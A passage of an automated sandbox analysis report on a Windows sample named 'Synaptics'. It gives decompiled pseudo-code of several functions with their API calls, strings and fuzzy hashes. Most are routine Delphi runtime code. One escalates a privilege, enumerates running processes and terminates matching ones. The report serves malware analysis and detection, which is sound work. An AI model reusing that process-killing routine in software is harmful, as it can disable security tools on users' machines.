				_v308 = 0;
				_v316 = 0;
				_v320 = 0;
				_v312 = 0;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t81);
				_push(0x475bd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t81 + 0xfffffec4;
				E00475958("SeSystemProfilePrivilege", __ebx, 1, __edi, __esi);
				_t60 = E00472B20(2, 0);
				_t84 = _t60 - 0xffffffff;
				if(_t84 != 0) {
					_v304 = 0x128;
					E00472B40(_t60,  &_v304);
					do {
						E00404C30( &_v312, 0x104,  &_v268);
						E00408DE4(_v312, 0x104,  &_v308);
						_push(_v308);
						E00404BB8( &_v320, E00404E80(_v8));
						E00408DE4(_v320, 0x104,  &_v316);
						_pop(_t50);
						E00404DCC(_t50, _v316);
						if(_t84 == 0) {
							_t78 = OpenProcess(1, 0, _v296);
							TerminateProcess(_t78, 0);
							CloseHandle(_t78);
						}
						_t53 = E00472B60(_t60,  &_v304);
						asm("sbb eax, eax");
					} while (_t53 + 1 != 0);
				}
				CloseHandle(_t60);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00475BDC);
				E004049E4( &_v320, 4);
				return E004049C0( &_v8);
			}


















                                                                                                                                                                                          0x00475a9d
                                                                                                                                                                                          0x00475a9e
                                                                                                                                                                                          0x00475aa1
                                                                                                                                                                                          0x00475aa7
                                                                                                                                                                                          0x00475aad
                                                                                                                                                                                          0x00475ab3
                                                                                                                                                                                          0x00475ab9
                                                                                                                                                                                          0x00475abf
                                                                                                                                                                                          0x00475ac6
                                                                                                                                                                                          0x00475ac7
                                                                                                                                                                                          0x00475acc
                                                                                                                                                                                          0x00475acf
                                                                                                                                                                                          0x00475ad9
                                                                                                                                                                                          0x00475aea
                                                                                                                                                                                          0x00475aec
                                                                                                                                                                                          0x00475aef
                                                                                                                                                                                          0x00475af5
                                                                                                                                                                                          0x00475b07
                                                                                                                                                                                          0x00475b0c
                                                                                                                                                                                          0x00475b1d
                                                                                                                                                                                          0x00475b2e
                                                                                                                                                                                          0x00475b39
                                                                                                                                                                                          0x00475b4a
                                                                                                                                                                                          0x00475b5b
                                                                                                                                                                                          0x00475b66
                                                                                                                                                                                          0x00475b67
                                                                                                                                                                                          0x00475b6c
                                                                                                                                                                                          0x00475b7e
                                                                                                                                                                                          0x00475b83
                                                                                                                                                                                          0x00475b89
                                                                                                                                                                                          0x00475b89
                                                                                                                                                                                          0x00475b96
                                                                                                                                                                                          0x00475b9e
                                                                                                                                                                                          0x00475ba1
                                                                                                                                                                                          0x00475b0c
                                                                                                                                                                                          0x00475baa
                                                                                                                                                                                          0x00475bb1
                                                                                                                                                                                          0x00475bb4
                                                                                                                                                                                          0x00475bb7
                                                                                                                                                                                          0x00475bc7
                                                                                                                                                                                          0x00475bd4

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00475958: GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475998
                                                                                                                                                                                            • Part of subcall function 00475958: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 0047599E
                                                                                                                                                                                            • Part of subcall function 00475958: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                            • Part of subcall function 00475958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                            • Part of subcall function 00475958: CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475A28
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000,00475BD5,?,00000000,022B2354,?,0049A4F9,001F0001,00000000,00000000,00000000,001F0001,00000000), ref: 00475B79
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00475BD5,?,00000000,022B2354,?,0049A4F9,001F0001,00000000,00000000,00000000), ref: 00475B83
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00475BD5,?,00000000,022B2354,?,0049A4F9,001F0001,00000000,00000000), ref: 00475B89
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00475BD5,?,00000000,022B2354,?,0049A4F9,001F0001,00000000,00000000,00000000,001F0001,00000000,00000000), ref: 00475BAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SeSystemProfilePrivilege, xrefs: 00475AD4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseHandle$OpenToken$AdjustCurrentLookupPrivilegePrivilegesTerminateValue
                                                                                                                                                                                          • String ID: SeSystemProfilePrivilege
                                                                                                                                                                                          • API String ID: 529513329-1276405716
                                                                                                                                                                                          • Opcode ID: 1789e6f1aa3e0718960daef0b86db95abb5abefffa6e9ca036fcb15a9386051e
                                                                                                                                                                                          • Instruction ID: 580ab526c7a6c82e50ebcca5458142647b940d84bf333f31e065c70003e8480a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1789e6f1aa3e0718960daef0b86db95abb5abefffa6e9ca036fcb15a9386051e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D93132709006189BDB20EB66CD82BDDB3B5AF85314F1085FAF50CB6291DA786F45CF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042572C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E0042572C(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = E00403F10(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				E00403BBC(0);
				_t1 = _t46 + 0x38; // 0x38
				L00407198();
				_t47 = E00424C3C(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = 0x425eb0;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E00425168(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0x425ed0;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00425434(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0x425ef0;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0x4257ec; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0x49e8ec; // 0x22b0b08
				E0041AFE4(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					E00403F68(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}


















                                                                                                                                                                                          0x0042572c
                                                                                                                                                                                          0x0042572c
                                                                                                                                                                                          0x00425731
                                                                                                                                                                                          0x00425733
                                                                                                                                                                                          0x00425736
                                                                                                                                                                                          0x00425736
                                                                                                                                                                                          0x0042573b
                                                                                                                                                                                          0x0042573d
                                                                                                                                                                                          0x00425743
                                                                                                                                                                                          0x00425748
                                                                                                                                                                                          0x0042574c
                                                                                                                                                                                          0x0042575d
                                                                                                                                                                                          0x0042575f
                                                                                                                                                                                          0x00425762
                                                                                                                                                                                          0x00425765
                                                                                                                                                                                          0x0042576c
                                                                                                                                                                                          0x0042576f
                                                                                                                                                                                          0x0042577e
                                                                                                                                                                                          0x00425780
                                                                                                                                                                                          0x00425783
                                                                                                                                                                                          0x00425786
                                                                                                                                                                                          0x0042578d
                                                                                                                                                                                          0x00425790
                                                                                                                                                                                          0x0042579f
                                                                                                                                                                                          0x004257a1
                                                                                                                                                                                          0x004257a4
                                                                                                                                                                                          0x004257a7
                                                                                                                                                                                          0x004257ae
                                                                                                                                                                                          0x004257b1
                                                                                                                                                                                          0x004257b4
                                                                                                                                                                                          0x004257bb
                                                                                                                                                                                          0x004257c0
                                                                                                                                                                                          0x004257c5
                                                                                                                                                                                          0x004257ca
                                                                                                                                                                                          0x004257cf
                                                                                                                                                                                          0x004257d3
                                                                                                                                                                                          0x004257d5
                                                                                                                                                                                          0x004257da
                                                                                                                                                                                          0x004257e1
                                                                                                                                                                                          0x004257e9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(vas,00428B00,00000000,00000001,00428C96,?,00000000,00000000,00429F01,00000000,00000000,004752CF,00000000,00000000,00CC0020,00CC0020), ref: 0042574C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                          • String ID: h7B$h8B$vas$5B
                                                                                                                                                                                          • API String ID: 32694325-2931570110
                                                                                                                                                                                          • Opcode ID: 4dc90a0c9199131fafbb6b17202aa32d21de1fd8461a0bd04d3f9f516b1fd6fb
                                                                                                                                                                                          • Instruction ID: 3f3694d375962d4255fc29ac861639cc4656e31162b1a28f9c4b0cd7577d53a2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc90a0c9199131fafbb6b17202aa32d21de1fd8461a0bd04d3f9f516b1fd6fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9118EB1A01B129FC320EF2AE840985FBF9BF84314384853FE449C7B11D779A9558B94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044E150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E0044E150(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49de44; // 0x49e744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044E4D4(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                                                                                                                                          0x0044e152
                                                                                                                                                                                          0x0044e155
                                                                                                                                                                                          0x0044e157
                                                                                                                                                                                          0x0044e160
                                                                                                                                                                                          0x0044e177
                                                                                                                                                                                          0x0044e179
                                                                                                                                                                                          0x0044e180
                                                                                                                                                                                          0x0044e18c
                                                                                                                                                                                          0x0044e190
                                                                                                                                                                                          0x0044e19e
                                                                                                                                                                                          0x0044e1a5
                                                                                                                                                                                          0x0044e1a9
                                                                                                                                                                                          0x0044e1bb
                                                                                                                                                                                          0x0044e1c0
                                                                                                                                                                                          0x0044e1de
                                                                                                                                                                                          0x0044e1e2
                                                                                                                                                                                          0x0044e1f0
                                                                                                                                                                                          0x0044e1f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e1fd
                                                                                                                                                                                          0x0044e1f7
                                                                                                                                                                                          0x0044e1c0
                                                                                                                                                                                          0x0044e1a5
                                                                                                                                                                                          0x0044e20a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                                                                                                                                                          • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                                                                                                                                                          • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                          • String ID: DI$P
                                                                                                                                                                                          • API String ID: 3227129158-1383934172
                                                                                                                                                                                          • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                          • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403A5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00403A5C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x49b024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x49b024; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x49b024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403ACD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403ad4);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                                                                                          0x00403a5d
                                                                                                                                                                                          0x00403a5f
                                                                                                                                                                                          0x00403a69
                                                                                                                                                                                          0x00403a85
                                                                                                                                                                                          0x00403ad4
                                                                                                                                                                                          0x00403ae6
                                                                                                                                                                                          0x00403ae9
                                                                                                                                                                                          0x00403af2
                                                                                                                                                                                          0x00403a87
                                                                                                                                                                                          0x00403a89
                                                                                                                                                                                          0x00403a8a
                                                                                                                                                                                          0x00403a8f
                                                                                                                                                                                          0x00403a92
                                                                                                                                                                                          0x00403a95
                                                                                                                                                                                          0x00403ab1
                                                                                                                                                                                          0x00403ab8
                                                                                                                                                                                          0x00403abb
                                                                                                                                                                                          0x00403abe
                                                                                                                                                                                          0x00403acc
                                                                                                                                                                                          0x00403acc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                          • Opcode ID: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                          • Instruction ID: 51662933c9f6040cf9cf53aa0deae1acaa2dd39dd85ca193a1d107641bf38472
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0801B575A10208BAEB11DFD1DD02BBEB7ACEB08B01F100077BA14F25D0E6786A10CB5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                                                                                                                                                          0x0040294c
                                                                                                                                                                                          0x0040294e
                                                                                                                                                                                          0x00402952
                                                                                                                                                                                          0x0040295c
                                                                                                                                                                                          0x0040295f
                                                                                                                                                                                          0x00402964
                                                                                                                                                                                          0x00402976
                                                                                                                                                                                          0x0040297c
                                                                                                                                                                                          0x0040297c
                                                                                                                                                                                          0x0040298b
                                                                                                                                                                                          0x00402992
                                                                                                                                                                                          0x0040299c
                                                                                                                                                                                          0x0040299c
                                                                                                                                                                                          0x004029b9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,022B2354,00000000), ref: 00402976
                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,022B2354), ref: 0040297C
                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,022B2354,00000000), ref: 0040298B
                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,022B2354), ref: 0040299C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                          • Opcode ID: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                          • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00415454 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* __ebp;
				void* _t119;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr _t250;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t264;
				intOrPtr _t268;
				void* _t271;
				void* _t273;
				intOrPtr _t274;

				_t278 = __fp0;
				_t269 = __edi;
				_t271 = _t273;
				_t274 = _t273 + 0xffffffd8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t204 =  *_v8;
				if(( *_v8 & 0x00000fff) >= 0x10f) {
					if(E0041713C(_t204,  &_v24) == 0) {
						E0041024C(__ecx);
					}
					_push( &_v20);
					_t216 = _v16;
					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
						_t207 =  *_v12;
						if((_t207 & 0x00000fff) >= 0x10f) {
							if(E0041713C(_t207,  &_v28) != 0) {
								_push( &_v18);
								_t217 = _v16;
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_t119 = E0041024C(_t217);
									goto L40;
								} else {
									if( *_v8 == _v18) {
										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
										goto L40;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t271);
										_push(0x415779);
										_push( *[fs:eax]);
										 *[fs:eax] = _t274;
										_t219 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
										E00410E14(_v8,  &_v44);
										if( *_v8 != _v18) {
											E0041015C(_t219);
										}
										_pop(_t250);
										 *[fs:eax] = _t250;
										_push(0x415780);
										return E004109E8( &_v44);
									}
								}
							} else {
								_t119 = E0041024C(_t216);
								goto L40;
							}
						} else {
							if(_t207 ==  *_v8) {
								_t119 = E004161B0(_v8, _v16, _v12);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x4156ca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t224 =  *_v12 & 0x0000ffff;
								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
								E00410E14(_v8,  &_v44);
								if( *_v8 !=  *_v12) {
									E0041015C(_t224);
								}
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x4156d1);
								return E004109E8( &_v44);
							}
						}
					} else {
						if( *_v12 == _v20) {
							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							goto L40;
						} else {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41562f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t228 = _v20 & 0x0000ffff;
							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
							if(_v44 != _v20) {
								E0041015C(_t228);
							}
							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							_pop(_t259);
							 *[fs:eax] = _t259;
							_push(0x415799);
							return E004109E8( &_v44);
						}
					}
				} else {
					if(E0041713C( *_v12,  &_v28) != 0) {
						_push( &_v18);
						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41558f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t234 =  *_v8 & 0x0000ffff;
							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
							if( *_v8 != _v44) {
								E0041015C(_t234);
							}
							E004161B0(_v8, _v16,  &_v44);
							_pop(_t264);
							 *[fs:eax] = _t264;
							_push(0x415799);
							return E004109E8( &_v44);
						} else {
							if( *_v8 == _v18) {
								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x415514);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t239 = _v18 & 0x0000ffff;
								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
								E00410E14(_v8,  &_v44);
								if( *_v8 != _v18) {
									E0041015C(_t239);
								}
								_pop(_t268);
								 *[fs:eax] = _t268;
								_push(0x41551b);
								return E004109E8( &_v44);
							}
						}
					} else {
						_t119 = E0041024C(__ecx);
						L40:
						return _t119;
					}
				}
			}
























                                                                                                                                                                                          0x00415454
                                                                                                                                                                                          0x00415454
                                                                                                                                                                                          0x00415455
                                                                                                                                                                                          0x00415457
                                                                                                                                                                                          0x0041545b
                                                                                                                                                                                          0x0041545e
                                                                                                                                                                                          0x00415461
                                                                                                                                                                                          0x00415467
                                                                                                                                                                                          0x00415474
                                                                                                                                                                                          0x004155a5
                                                                                                                                                                                          0x004155a7
                                                                                                                                                                                          0x004155a7
                                                                                                                                                                                          0x004155af
                                                                                                                                                                                          0x004155b3
                                                                                                                                                                                          0x004155c0
                                                                                                                                                                                          0x00415650
                                                                                                                                                                                          0x0041565d
                                                                                                                                                                                          0x004156f3
                                                                                                                                                                                          0x00415702
                                                                                                                                                                                          0x00415706
                                                                                                                                                                                          0x00415713
                                                                                                                                                                                          0x00415794
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00415715
                                                                                                                                                                                          0x0041571f
                                                                                                                                                                                          0x0041578f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00415721
                                                                                                                                                                                          0x00415724
                                                                                                                                                                                          0x00415725
                                                                                                                                                                                          0x0041572c
                                                                                                                                                                                          0x0041572d
